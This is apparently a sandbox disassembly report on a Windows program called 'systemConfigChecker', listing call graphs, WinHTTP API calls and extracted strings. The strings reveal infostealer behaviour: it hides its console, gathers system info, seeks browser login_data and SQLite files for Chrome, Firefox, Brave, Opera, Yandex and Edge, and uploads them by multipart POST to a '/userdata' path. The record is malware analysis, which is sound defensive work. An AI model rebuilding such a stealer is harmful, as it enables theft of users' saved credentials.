__std_exception_destroy 3702 7ff64e1311f8 3701->3702 3703 7ff64e131205 3701->3703 3704 7ff64e13b500 _Receive_impl free 3702->3704 3704->3703 3918 7ff64e136cd0 3919 7ff64e136ce9 ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEBD_J 3918->3919 3920 7ff64e136cf8 3918->3920 3919->3920 3921 7ff64e136d79 3920->3921 3922 7ff64e136d59 3920->3922 3923 7ff64e136d2c memcpy 3920->3923 3922->3921 3924 7ff64e136d65 fwrite 3922->3924 3923->3921 3923->3922 3924->3921 3925 7ff64e1368d0 3926 7ff64e13691e 3925->3926 3928 7ff64e1368e1 3925->3928 3927 7ff64e136916 3929 7ff64e13b500 _Receive_impl free 3927->3929 3928->3927 3930 7ff64e136931 _invalid_parameter_noinfo_noreturn 3928->3930 3929->3926 3935 7ff64e139fb0 ??0_Lockit@std@@QEAA@H ??Bid@locale@std@ 3930->3935 3933 7ff64e136978 ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 3934 7ff64e136965 3936 7ff64e13a012 3935->3936 3937 7ff64e13a087 ??1_Lockit@std@@QEAA 3936->3937 3939 7ff64e13a029 ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12 3936->3939 3940 7ff64e13a035 3936->3940 3938 7ff64e13b4e0 Concurrency::cancel_current_task 8 API calls 3937->3938 3941 7ff64e136955 ?always_noconv@codecvt_base@std@ 3938->3941 3939->3940 3940->3937 3942 7ff64e13a04c ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@ 3940->3942 3941->3933 3941->3934 3943 7ff64e13a0b7 3942->3943 3944 7ff64e13a060 3942->3944 3952 7ff64e131470 3943->3952 3949 7ff64e13b448 3944->3949 3947 7ff64e13a0bc 3950 7ff64e13b508 std::_Facet_Register 3 API calls 3949->3950 3951 7ff64e13a072 3950->3951 3951->3937 3955 7ff64e131440 3952->3955 3954 7ff64e13147e _CxxThrowException __std_exception_copy 3954->3947 3955->3954 3622 7ff64e139bd0 ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12 3642 7ff64e13b950 3646 7ff64e13c150 SetUnhandledExceptionFilter 3642->3646 3647 7ff64e138750 3648 7ff64e137c10 _Receive_impl 3 API calls 3647->3648 3649 7ff64e138764 3648->3649 3650 7ff64e138776 3649->3650 3651 7ff64e13b500 _Receive_impl free 3649->3651 3651->3650 3708 7ff64e13d01c 3709 7ff64e13d024 3708->3709 3710 7ff64e13d071 3709->3710 3711 7ff64e13b500 _Receive_impl free 3709->3711 3711->3709 3799 7ff64e13ba9a 3800 7ff64e13c0fc GetModuleHandleW 3799->3800 3801 7ff64e13baa1 3800->3801 3802 7ff64e13bae0 _exit 3801->3802 3803 7ff64e13baa5 3801->3803 3585 7ff64e136da0 3586 7ff64e136db7 3585->3586 3587 7ff64e136dc2 3585->3587 3588 7ff64e136dd8 3587->3588 3589 7ff64e136dc9 ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEAD_J 3587->3589 3590 7ff64e136dfd memcpy 3588->3590 3592 7ff64e136e32 3588->3592 3589->3588 3590->3592 3591 7ff64e136ece 3592->3591 3593 7ff64e136eae 3592->3593 3594 7ff64e136e80 fread 3592->3594 3593->3591 3595 7ff64e136eb3 fread 3593->3595 3594->3591 3594->3592 3595->3591 3712 7ff64e131220 __std_exception_destroy 3957 7ff64e133720 3958 7ff64e137c10 _Receive_impl 3 API calls 3957->3958 3959 7ff64e133762 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3958->3959 3964 7ff64e137330 3965 7ff64e137356 3964->3965 3968 7ff64e13735d 3964->3968 3966 7ff64e13b4e0 Concurrency::cancel_current_task 8 API calls 3965->3966 3967 7ff64e1374d6 3966->3967 3968->3965 3969 7ff64e137405 ?out@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD 3968->3969 3970 7ff64e1373e3 fputc 3968->3970 3971 7ff64e13744a 3969->3971 3972 7ff64e137474 3969->3972 3970->3965 3971->3972 3973 7ff64e13744f 3971->3973 3972->3965 3974 7ff64e137483 fwrite 3972->3974 3973->3965 3975 7ff64e137454 fputc 3973->3975 3974->3965 3975->3965 3717 7ff64e138830 ??1?$codecvt@_WDU_Mbstatet@@@std@@MEAA 3718 7ff64e138861 3717->3718 3719 7ff64e138854 3717->3719 3720 7ff64e13b500 _Receive_impl free 3719->3720 3720->3718 3721 7ff64e13c630 3722 7ff64e13c658 3721->3722 3723 7ff64e13c643 ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3721->3723 3723->3722 3804 7ff64e1388b0 ?uncaught_exception@std@ 3805 7ff64e1388cd 3804->3805 3806 7ff64e1388c3 ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@ 3804->3806 3806->3805 3807 7ff64e1386b0 3808 7ff64e137530 13 API calls 3807->3808 3809 7ff64e138704 ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3808->3809 3810 7ff64e138731 3809->3810 3811 7ff64e138720 3809->3811 3812 7ff64e13b500 _Receive_impl free 3811->3812 3812->3810 3976 7ff64e13cf30 ??1_Lockit@std@@QEAA 3656 7ff64e13cdae ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA 3657 7ff64e13cf76 3658 7ff64e13cfab __current_exception __current_exception_context terminate 3657->3658 3659 7ff64e13cf9f 3657->3659 3658->3659 3813 7ff64e13c67c 3814 7ff64e13c69c 3813->3814 3815 7ff64e13c68f 3813->3815 3816 7ff64e138450 2 API calls 3815->3816 3816->3814 3617 7ff64e131000 ?_Init@locale@std@@CAPEAV_Locimp@12@_N 3618 7ff64e13b508 std::_Facet_Register 3 API calls 3617->3618 3619 7ff64e13107b ??0?$codecvt@_WDU_Mbstatet@@@std@@QEAA@_K ?_New_Locimp@_Locimp@locale@std@@CAPEAV123@AEBV123@ ??Bid@locale@std@ ?_Addfac@_Locimp@locale@std@@AEAAXPEAVfacet@23@_K ??4?$_Yarn@D@std@@QEAAAEAV01@PEBD 3618->3619 3620 7ff64e1310f2 3619->3620 3977 7ff64e137d00 3980 7ff64e137d3b 3977->3980 3978 7ff64e13b4e0 Concurrency::cancel_current_task 8 API calls 3979 7ff64e137e5a 3978->3979 3980->3978 3725 7ff64e13cdfe ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA 3821 7ff64e13b888 3822 7ff64e13b898 3821->3822 3834 7ff64e13b68c 3822->3834 3824 7ff64e13bfac 9 API calls 3825 7ff64e13b93d 3824->3825 3826 7ff64e13b8bc _RTC_Initialize 3832 7ff64e13b91f 3826->3832 3842 7ff64e13c270 InitializeSListHead 3826->3842 3832->3824 3833 7ff64e13b92d 3832->3833 3835 7ff64e13b69d 3834->3835 3836 7ff64e13b6cf 3834->3836 3837 7ff64e13b70c 3835->3837 3840 7ff64e13b6a2 __scrt_acquire_startup_lock 3835->3840 3836->3826 3838 7ff64e13bfac 9 API calls 3837->3838 3839 7ff64e13b716 3838->3839 3840->3836 3841 7ff64e13b6bf _initialize_onexit_table 3840->3841 3841->3836 3843 7ff64e13ce88 ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N 3671 7ff64e136990 3672 7ff64e1369d0 3671->3672 3673 7ff64e1369a3 3671->3673 3673->3672 3674 7ff64e1369b3 fflush 3673->3674 3729 7ff64e137610 3730 7ff64e13764e 3729->3730 3731 7ff64e137621 3729->3731 3732 7ff64e137646 3731->3732 3733 7ff64e137661 _invalid_parameter_noinfo_noreturn 3731->3733 3734 7ff64e13b500 _Receive_impl free 3732->3734 3735 7ff64e13767e 3733->3735 3734->3730 3736 7ff64e137a10 3738 7ff64e137a38 3736->3738 3748 7ff64e137a3d 3736->3748 3737 7ff64e137af7 3739 7ff64e13b508 std::_Facet_Register 3 API calls 3737->3739 3738->3737 3740 7ff64e137ac6 3738->3740 3742 7ff64e137ab9 3738->3742 3746 7ff64e137aab 3738->3746 3738->3748 3739->3746 3744 7ff64e13b508 std::_Facet_Register 3 API calls 3740->3744 3740->3748 3741 7ff64e137b10 memcpy 3750 7ff64e137b4b 3741->3750 3742->3740 3743 7ff64e137c03 3742->3743 3745 7ff64e131270 Concurrency::cancel_current_task __std_exception_copy 3743->3745 3744->3746 3747 7ff64e137c08 3745->3747 3746->3741 3749 7ff64e137bde _invalid_parameter_noinfo_noreturn 3746->3749 3749->3748 3750->3748 3750->3749 3751 7ff64e137bb0 3750->3751 3752 7ff64e13b500 _Receive_impl free 3751->3752 3752->3748 3985 7ff64e137510 3986 7ff64e13751c _lock_file 3985->3986 3987 7ff64e137523 3985->3987 3986->3987 3675 7ff64e138790 3676 7ff64e137c10 _Receive_impl 3 API calls 3675->3676 3677 7ff64e1387e1 ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3676->3677 3678 7ff64e13880b 3677->3678 3679 7ff64e1387fa 3677->3679 3680 7ff64e13b500 _Receive_impl free 3679->3680 3680->3678 3753 7ff64e13c610 3754 7ff64e13b500 _Receive_impl free 3753->3754 3755 7ff64e13c627 3754->3755 3852 7ff64e13c494 3853 7ff64e13c4cc __GSHandlerCheckCommon 3852->3853 3854 7ff64e13c4f8 3853->3854 3855 7ff64e13c4e7 __CxxFrameHandler4 3853->3855 3855->3854
              APIs
                • Part of subcall function 00007FF64E131520: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF64E13157F
                • Part of subcall function 00007FF64E131520: ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF64E13159E
                • Part of subcall function 00007FF64E131520: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF64E1315D2
                • Part of subcall function 00007FF64E131520: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z.MSVCP140 ref: 00007FF64E131609
                • Part of subcall function 00007FF64E131520: isalnum.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF64E131648
                • Part of subcall function 00007FF64E131520: ?setw@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140 ref: 00007FF64E13166D
                • Part of subcall function 00007FF64E131520: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF64E13169B
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF64E131C67
              • memcpy.VCRUNTIME140 ref: 00007FF64E131CAF
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF64E131DB1
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF64E131E02
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF64E131E53
              • WinHttpOpen.WINHTTP ref: 00007FF64E131E86
              • WinHttpConnect.WINHTTP ref: 00007FF64E131EC2
              • memcpy.VCRUNTIME140 ref: 00007FF64E13207E
              • memcpy.VCRUNTIME140 ref: 00007FF64E1321A4
              • GetFileAttributesW.KERNELBASE ref: 00007FF64E132254
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF64E1322A7
              • memcpy.VCRUNTIME140 ref: 00007FF64E1324FF
              • memcmp.VCRUNTIME140 ref: 00007FF64E132597
              • memcpy.VCRUNTIME140 ref: 00007FF64E1327C6
              • memcpy.VCRUNTIME140 ref: 00007FF64E132BF9
                • Part of subcall function 00007FF64E13A0C0: memcpy.VCRUNTIME140 ref: 00007FF64E13A0F8
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF64E13301F
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF64E13302A
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF64E133031
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF64E133038
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF64E13303F
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF64E133046
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF64E13304D
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF64E133054
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF64E13305B
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF64E133062
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF64E133069
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF64E133070
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF64E133077
              • WinHttpCloseHandle.WINHTTP ref: 00007FF64E133357
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF64E13339F
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF64E1333C6
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF64E1333D6
              • GetLastError.KERNEL32 ref: 00007FF64E1333A6
                • Part of subcall function 00007FF64E1399F0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139AE6
              • WinHttpCloseHandle.WINHTTP ref: 00007FF64E1333E9
              • GetLastError.KERNEL32 ref: 00007FF64E1333F1
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF64E133411
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF64E133421
              • WinHttpCloseHandle.WINHTTP ref: 00007FF64E13342A
              • GetLastError.KERNEL32 ref: 00007FF64E133432
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF64E13307E
                • Part of subcall function 00007FF64E1399F0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139A69
                • Part of subcall function 00007FF64E1399F0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139A89
                • Part of subcall function 00007FF64E1399F0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139A99
                • Part of subcall function 00007FF64E1399F0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140(?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139B7C
                • Part of subcall function 00007FF64E1399F0: ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139B83
                • Part of subcall function 00007FF64E1399F0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140(?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139B90
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF64E133085
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF64E13308C
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF64E1323CE
                • Part of subcall function 00007FF64E13B508: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF64E13B538
                • Part of subcall function 00007FF64E13B508: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF64E13B53E
              • WinHttpOpenRequest.WINHTTP ref: 00007FF64E131F1F
                • Part of subcall function 00007FF64E13B508: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF64E13107B), ref: 00007FF64E13B522
              • memcpy.VCRUNTIME140 ref: 00007FF64E1330E8
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF64E13313F
              • WinHttpSendRequest.WINHTTP ref: 00007FF64E13318B
              • WinHttpReceiveResponse.WINHTTP ref: 00007FF64E13319E
              • WinHttpQueryHeaders.WINHTTP ref: 00007FF64E1331D5
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF64E13324A
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF64E13325A
              • WinHttpCloseHandle.WINHTTP ref: 00007FF64E133263
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF64E1332A2
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF64E1332F0
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF64E133338
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF64E133452
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF64E133462
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF64E133494
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF64E1334DC
              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF64E133519
              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF64E13351F
              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF64E133525
              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF64E133537
              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF64E13353D
              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF64E133549
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID: _invalid_parameter_noinfo_noreturn$V01@$U?$char_traits@$D@std@@@std@@$??6?$basic_ostream@$Http$Concurrency::cancel_current_taskmemcpy$V01@@$CloseHandle$ErrorLastU?$char_traits@_W@std@@@std@@$?good@ios_base@std@@OpenRequest$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?setw@std@@?sputc@?$basic_streambuf@?uncaught_exception@std@@AttributesConnectD@std@@@1@_FileHeadersJ@1@_Osfx@?$basic_ostream@_QueryReceiveResponseSendSmanip@_U?$_V12@V21@@V?$basic_streambuf@Vios_base@1@isalnummallocmemcmp
              • String ID: $" }$", "ip": "$"; filename="login_data$--WebKitFormBoundary$.json"$.sqlite"$/userdata$?? ??????? ???????? ????? ?? ???????.$?? ??????? ????????? ??????. HTTP ?????? ???: $?????? ??????? ??????????. HTTP ?????? ???: $?????? ???????? ?????? WinHTTP: $?????? ???????? ???????: $?????? ???????? HTTP-???????: $?????? ?????????? ? ????????: $Content-Disposition: form-data; name="sysinfo"$Content-Type: application/json$Content-Type: application/x-sqlite3$Content-Type: multipart/form-data; boundary=WebKitFormBoundary$File is found: $File not found: $FileData is empty$POST$WinHTTP/1.0$brave$chrome$chromebeta$chromium$firefox$fo": "$msedge$name="$opera$operagx$yandex
              • API String ID: 3244378811-4092172495
              • Opcode ID: 6c496a129e32a4424009d45ccecc1b727d9bdd980bff025a2067f5935486c390
              • Instruction ID: 60a5016a034cd3f6fe49d77697c3edf67fb15d1b29bf246f6a37de8a07c58add
              • Opcode Fuzzy Hash: 6c496a129e32a4424009d45ccecc1b727d9bdd980bff025a2067f5935486c390
              • Instruction Fuzzy Hash: 7FE28D62A4CB8685FA20BB25D8403FD2361EB657A4F505731EA6D87ED9EF7CE184C700

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 483 7ff64e135d80-7ff64e135e24 GetConsoleWindow ShowWindow call 7ff64e139610 call 7ff64e134a40 call 7ff64e1383c0 490 7ff64e135e26-7ff64e135e38 483->490 491 7ff64e135e5b-7ff64e135e92 call 7ff64e139610 call 7ff64e134640 call 7ff64e1383c0 483->491 492 7ff64e135e56 call 7ff64e13b500 490->492 493 7ff64e135e3a-7ff64e135e4d 490->493 502 7ff64e135ec9-7ff64e135f00 call 7ff64e139610 call 7ff64e133560 call 7ff64e1383c0 491->502 503 7ff64e135e94-7ff64e135ea6 491->503 492->491 493->492 495 7ff64e135e4f-7ff64e135e55 _invalid_parameter_noinfo_noreturn 493->495 495->492 514 7ff64e135f37-7ff64e135fe7 call 7ff64e139610 GlobalMemoryStatusEx memset call 7ff64e136810 call 7ff64e1399f0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z call 7ff64e1399f0 502->514 515 7ff64e135f02-7ff64e135f14 502->515 505 7ff64e135ea8-7ff64e135ebb 503->505 506 7ff64e135ec4 call 7ff64e13b500 503->506 505->506 508 7ff64e135ebd-7ff64e135ec3 _invalid_parameter_noinfo_noreturn 505->508 506->502 508->506 528 7ff64e135fe9-7ff64e135ff3 514->528 529 7ff64e13600a-7ff64e13600d 514->529 516 7ff64e135f16-7ff64e135f29 515->516 517 7ff64e135f32 call 7ff64e13b500 515->517 516->517 519 7ff64e135f2b-7ff64e135f31 _invalid_parameter_noinfo_noreturn 516->519 517->514 519->517 528->529 530 7ff64e135ff5-7ff64e136008 528->530 531 7ff64e136031-7ff64e136035 529->531 532 7ff64e13600f-7ff64e136019 529->532 533 7ff64e136039-7ff64e13603c 530->533 531->533 532->531 534 7ff64e13601b-7ff64e13602f 532->534 535 7ff64e136049-7ff64e1360a8 call 7ff64e137c10 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ call 7ff64e1383c0 533->535 536 7ff64e13603e-7ff64e136048 call 7ff64e1396c0 533->536 534->533 543 7ff64e1360dc-7ff64e136113 call 7ff64e139610 call 7ff64e133780 call 7ff64e1383c0 535->543 544 7ff64e1360aa-7ff64e1360bc 535->544 536->535 563 7ff64e13614a-7ff64e136181 call 7ff64e139610 call 7ff64e133aa0 call 7ff64e1383c0 543->563 564 7ff64e136115-7ff64e136127 543->564 545 7ff64e1360d7 call 7ff64e13b500 544->545 546 7ff64e1360be-7ff64e1360d1 544->546 545->543 546->545 548 7ff64e13676e-7ff64e136774 _invalid_parameter_noinfo_noreturn 546->548 552 7ff64e136775 call 7ff64e13b500 548->552 555 7ff64e13677a-7ff64e136796 552->555 557 7ff64e136798-7ff64e1367a9 555->557 558 7ff64e1367cc-7ff64e1367fd call 7ff64e13b4e0 555->558 560 7ff64e1367c7 call 7ff64e13b500 557->560 561 7ff64e1367ab-7ff64e1367be 557->561 560->558 561->560 567 7ff64e1367c0-7ff64e1367c6 _invalid_parameter_noinfo_noreturn 561->567 578 7ff64e1361b8-7ff64e1361da call 7ff64e134e50 563->578 579 7ff64e136183-7ff64e136195 563->579 565 7ff64e136129-7ff64e13613c 564->565 566 7ff64e136145 call 7ff64e13b500 564->566 565->566 571 7ff64e13613e-7ff64e136144 _invalid_parameter_noinfo_noreturn 565->571 566->563 567->560 571->566 586 7ff64e1361e0-7ff64e13620d 578->586 587 7ff64e1367fe-7ff64e136803 call 7ff64e131310 578->587 581 7ff64e136197-7ff64e1361aa 579->581 582 7ff64e1361b3 call 7ff64e13b500 579->582 581->582 584 7ff64e1361ac-7ff64e1361b2 _invalid_parameter_noinfo_noreturn 581->584 582->578 584->582 588 7ff64e136288-7ff64e136315 memcpy call 7ff64e139610 call 7ff64e1383c0 586->588 589 7ff64e13620f-7ff64e136219 586->589 599 7ff64e136804-7ff64e136809 call 7ff64e131270 587->599 612 7ff64e136317-7ff64e136329 588->612 613 7ff64e13634d-7ff64e136355 588->613 592 7ff64e13624b-7ff64e13625e 589->592 593 7ff64e13621b-7ff64e136228 589->593 597 7ff64e136260-7ff64e136262 592->597 598 7ff64e136264-7ff64e13626b 592->598 596 7ff64e13622c-7ff64e136237 call 7ff64e13b508 593->596 614 7ff64e13623d-7ff64e136249 596->614 615 7ff64e13637f-7ff64e136385 _invalid_parameter_noinfo_noreturn 596->615 602 7ff64e136284 597->602 603 7ff64e13627c-7ff64e136281 call 7ff64e13b508 598->603 604 7ff64e13626d-7ff64e136274 598->604 602->588 603->602 604->599 609 7ff64e13627a 604->609 609->596 617 7ff64e136347-7ff64e13634c call 7ff64e13b500 612->617 618 7ff64e13632b-7ff64e13633e 612->618 619 7ff64e136357-7ff64e136368 613->619 620 7ff64e13638b-7ff64e1363c2 call 7ff64e139610 call 7ff64e133cd0 call 7ff64e1383c0 613->620 614->602 616 7ff64e136386 call 7ff64e13b500 615->616 616->620 617->613 618->617 624 7ff64e136340-7ff64e136346 _invalid_parameter_noinfo_noreturn 618->624 619->616 621 7ff64e13636a-7ff64e13637d 619->621 632 7ff64e1363f9-7ff64e136430 call 7ff64e139610 call 7ff64e133f60 call 7ff64e1383c0 620->632 633 7ff64e1363c4-7ff64e1363d6 620->633 621->615 621->616 624->617 644 7ff64e136467-7ff64e136488 call 7ff64e134180 call 7ff64e1383c0 632->644 645 7ff64e136432-7ff64e136444 632->645 635 7ff64e1363d8-7ff64e1363eb 633->635 636 7ff64e1363f4 call 7ff64e13b500 633->636 635->636 638 7ff64e1363ed-7ff64e1363f3 _invalid_parameter_noinfo_noreturn 635->638 636->632 638->636 654 7ff64e13648a-7ff64e13649c 644->654 655 7ff64e1364bf-7ff64e136555 memset call 7ff64e136810 GetModuleFileNameA call 7ff64e1399f0 * 3 644->655 646 7ff64e136446-7ff64e136459 645->646 647 7ff64e136462 call 7ff64e13b500 645->647 646->647 649 7ff64e13645b-7ff64e136461 _invalid_parameter_noinfo_noreturn 646->649 647->644 649->647 656 7ff64e1364ba call 7ff64e13b500 654->656 657 7ff64e13649e-7ff64e1364b1 654->657 668 7ff64e136578-7ff64e13657b 655->668 669 7ff64e136557-7ff64e136561 655->669 656->655 657->656 659 7ff64e1364b3-7ff64e1364b9 _invalid_parameter_noinfo_noreturn 657->659 659->656 671 7ff64e13657d-7ff64e136587 668->671 672 7ff64e13659f-7ff64e1365a3 668->672 669->668 670 7ff64e136563-7ff64e136576 669->670 673 7ff64e1365a7-7ff64e1365aa 670->673 671->672 674 7ff64e136589-7ff64e13659d 671->674 672->673 675 7ff64e1365b7-7ff64e13660f call 7ff64e137c10 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ call 7ff64e1383c0 673->675 676 7ff64e1365ac-7ff64e1365b6 call 7ff64e1396c0 673->676 674->673 683 7ff64e136611-7ff64e136623 675->683 684 7ff64e136643-7ff64e13667a call 7ff64e139610 call 7ff64e134390 call 7ff64e1383c0 675->684 676->675 686 7ff64e13663e call 7ff64e13b500 683->686 687 7ff64e136625-7ff64e136638 683->687 699 7ff64e13667c-7ff64e13668e 684->699 700 7ff64e1366b1-7ff64e1366e5 call 7ff64e135510 call 7ff64e131b50 684->700 686->684 687->686 688 7ff64e13672c-7ff64e136732 _invalid_parameter_noinfo_noreturn 687->688 692 7ff64e136733-7ff64e13673b call 7ff64e13b500 688->692 698 7ff64e13673c-7ff64e136744 692->698 698->555 701 7ff64e136746-7ff64e136757 698->701 702 7ff64e1366ac call 